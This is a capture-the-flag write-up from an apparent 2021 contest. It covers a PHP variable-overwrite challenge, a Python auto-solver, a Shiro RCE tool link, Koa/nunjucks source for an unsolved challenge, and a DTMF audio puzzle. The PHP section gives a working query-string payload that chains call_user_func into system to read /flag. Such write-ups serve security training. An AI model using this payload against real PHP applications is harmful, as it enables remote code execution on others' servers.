
CnHongke


image-20210205120848244

WEB

EDR

// Challenge source. extract() imports every key of the array as a local
// variable, so the caller controls $collect, $limit, $path, $row and $host
// (variable overwrite); there is no allowlist of accepted keys.
extract($argv);
var_dump($collect);
// Only $limit is checked, and only for presence, never for an allowed value.
if (!isset($limit)) {
return;
}
// $collect is used as a variable function with caller-supplied arguments;
// nothing restricts which callable it may name, so this is an arbitrary
// function call. A fixed dispatch table keyed by an allowlisted name would
// remove the issue.
$result = $collect($path, $row, $limit, $host);

变量覆盖 加 call_user_func

payload

host=cat /flag&limit=system&path=call_user_func&row=call_user_func&collect=call_user_func

fast x 3

原题

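import re
import urllib.parse
import binascii
from collections import Counter

# A Cookie is required: without it the server hands out a different value on
# every request and the challenge cannot be solved.
header = {
"Cookie":"session=3318ae57-680f-45f8-864a-14dbdf736032; PHPSESSID=397hupqilugksvv6ebidg8dha1"
}

url = "http://180.109.90.207:23939"


def order_by_frequency(text):
    """Build the answer string the solver submits for ``text``.

    Distinct characters are taken in sorted order, their occurrence counts are
    sorted ascending, and for every entry of that sorted count list each
    character having that count is appended.  When several characters share a
    count, each of them is therefore appended once per occurrence of that count
    value (e.g. ``"abc"`` -> ``"abcabcabc"``).  That repetition is kept from the
    original solver; confirm it matches what the challenge expects before
    relying on it.

    Returns ``""`` for empty input.
    """
    counts = Counter(text)
    uniq = sorted(counts)                  # distinct characters, sorted
    per_char = [counts[c] for c in uniq]   # count of each character, in uniq order
    ordered = sorted(per_char)
    # Debug output kept from the original solver.
    print(per_char, ordered)
    return "".join(c for k in ordered for c, n in zip(uniq, per_char) if k == n)


def main():
    # Imported here so order_by_frequency() can be used without the HTTP dependency.
    import requests

    rep = requests.get(url, headers=header)
    res = re.findall('id="math">(.*?)</div></b>', rep.text)
    print(res)
    if not res:
        raise SystemExit("challenge text not found in response")
    sss = order_by_frequency(res[0])
    print(sss)
    data = {"res": sss}
    ccc = requests.post(url, data=data, headers=header)
    print(ccc.text)


if __name__ == "__main__":
    main()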

Shiro

https://github.com/wyzxxz/shiro_rce_tool

image-20210205101832778

Reset [没有做出来]

获得源代码

image-20210205114656772

  • app.js
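const Koa = require('koa');
const bodyParser = require('koa-bodyparser');
const controller = require('./controller');
const templating = require('./templating');
const staticFiles = require('./static-files');

const app = new Koa();
// Outside production, templates are reloaded on change and not cached.
const isProduction = process.env.NODE_ENV === 'production';

// Request logger. ctx.request.url includes the query string, so anything
// passed as a query parameter ends up in the log.
app.use(async (ctx, next) => {
  console.log(`Process ${ctx.request.method} ${ctx.request.url}...`);
  await next();
});

// Serve /static/* from the local static directory.
app.use(staticFiles('/static/', __dirname + '/static'));

// Parse request bodies before any controller runs.
app.use(bodyParser());

app.use(templating('views', {
  noCache: !isProduction,
  watch: !isProduction,
}));

// Routes are discovered by controller.js from the controllers directory.
app.use(controller());

app.listen(3000);
console.log('app started at port 3000...');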
  • controller.js
const fs = require('fs');

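/**
 * Register every entry of `mapping` on `router`.
 *
 * Keys have the form `'<METHOD> <path>'` where METHOD is one of GET, POST,
 * PUT or DELETE; the value is the route handler. Keys with any other prefix
 * are logged and skipped, so a typo in a key silently drops that route.
 *
 * @param {object} router - koa-router instance exposing get/post/put/del
 * @param {Object<string, Function>} mapping - route table exported by a controller module
 */
function addMapping(router, mapping) {
  // Key prefix -> router method. The first matching prefix wins, exactly like
  // the original if/else chain.
  const METHODS = [
    ['GET ', 'get'],
    ['POST ', 'post'],
    ['PUT ', 'put'],
    ['DELETE ', 'del'],
  ];
  // Object.entries visits own keys only, so nothing inherited from the
  // prototype chain can be registered as a route.
  for (const [url, handler] of Object.entries(mapping || {})) {
    const entry = METHODS.find(([prefix]) => url.startsWith(prefix));
    if (entry === undefined) {
      console.log(`invalid URL: ${url}`);
      continue;
    }
    const [prefix, method] = entry;
    const path = url.substring(prefix.length);
    router[method](path, handler);
    console.log(`register URL mapping: ${prefix.trim()} ${path}`);
  }
}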

/**
 * Load every `.js` file in `dir` (resolved relative to this file) as a
 * controller module and register its route table on `router`.
 *
 * @param {object} router - koa-router instance
 * @param {string} dir - controller directory, relative to __dirname
 */
function addControllers(router, dir) {
  const base = `${__dirname}/${dir}`;
  const scripts = fs.readdirSync(base).filter((name) => name.endsWith('.js'));
  for (const name of scripts) {
    console.log(`process controller: ${name}...`);
    // Each controller module exports a '<METHOD> <path>' -> handler table.
    const mapping = require(`${base}/${name}`);
    addMapping(router, mapping);
  }
}

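/**
 * Build the koa middleware that dispatches to the controllers found in `dir`.
 *
 * @param {string} [dir] - controller directory relative to this file; any
 *   falsy value (including '') selects 'controllers'
 * @returns {Function} the router's routes() middleware
 */
module.exports = function (dir) {
  const controllersDir = dir || 'controllers';
  const router = require('koa-router')();
  addControllers(router, controllersDir);
  return router.routes();
};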
  • templating.js
const nunjucks = require('nunjucks');

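/**
 * Create a nunjucks Environment that loads templates from `path`.
 *
 * @param {string} path - template directory handed to FileSystemLoader
 * @param {object} opts
 * @param {boolean} [opts.autoescape=true] - HTML-escape rendered variables;
 *   null/undefined keep the default, any other value is passed through
 * @param {boolean} [opts.noCache=false]
 * @param {boolean} [opts.watch=false]
 * @param {boolean} [opts.throwOnUndefined=false]
 * @param {Object<string, Function>} [opts.filters] - extra filters to register
 * @returns {nunjucks.Environment}
 */
function createEnv(path, opts) {
  // autoescape is the XSS guard for every rendered template: it stays on
  // unless the caller sets it explicitly (null no longer disables it).
  const autoescape = opts.autoescape == null ? true : opts.autoescape;
  const noCache = opts.noCache || false;
  const watch = opts.watch || false;
  const throwOnUndefined = opts.throwOnUndefined || false;
  const loader = new nunjucks.FileSystemLoader(path, { noCache, watch });
  const env = new nunjucks.Environment(loader, { autoescape, throwOnUndefined });
  // Own keys only: filters inherited through the prototype are not registered.
  for (const [name, fn] of Object.entries(opts.filters || {})) {
    env.addFilter(name, fn);
  }
  return env;
}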

/**
 * Koa middleware factory: installs ctx.render(view, model), which renders
 * `view` with ctx.state merged under `model` and sets the response to
 * text/html. Escaping follows the environment's autoescape setting.
 *
 * @param {string} path - template directory
 * @param {object} opts - options forwarded to createEnv
 * @returns {Function} koa middleware
 */
function templating(path, opts) {
  const env = createEnv(path, opts);
  const makeRender = (ctx) => (view, model) => {
    // model keys win over ctx.state keys; a missing state or model acts as {}
    const context = Object.assign({}, ctx.state || {}, model || {});
    ctx.response.body = env.render(view, context);
    ctx.response.type = 'text/html';
  };
  return async (ctx, next) => {
    ctx.render = makeRender(ctx);
    await next();
  };
}

module.exports = templating;

MISC

DTMF

audacity 转换音频格式

再利用dtmf2num.exe 获得信息

image-20210205103045343
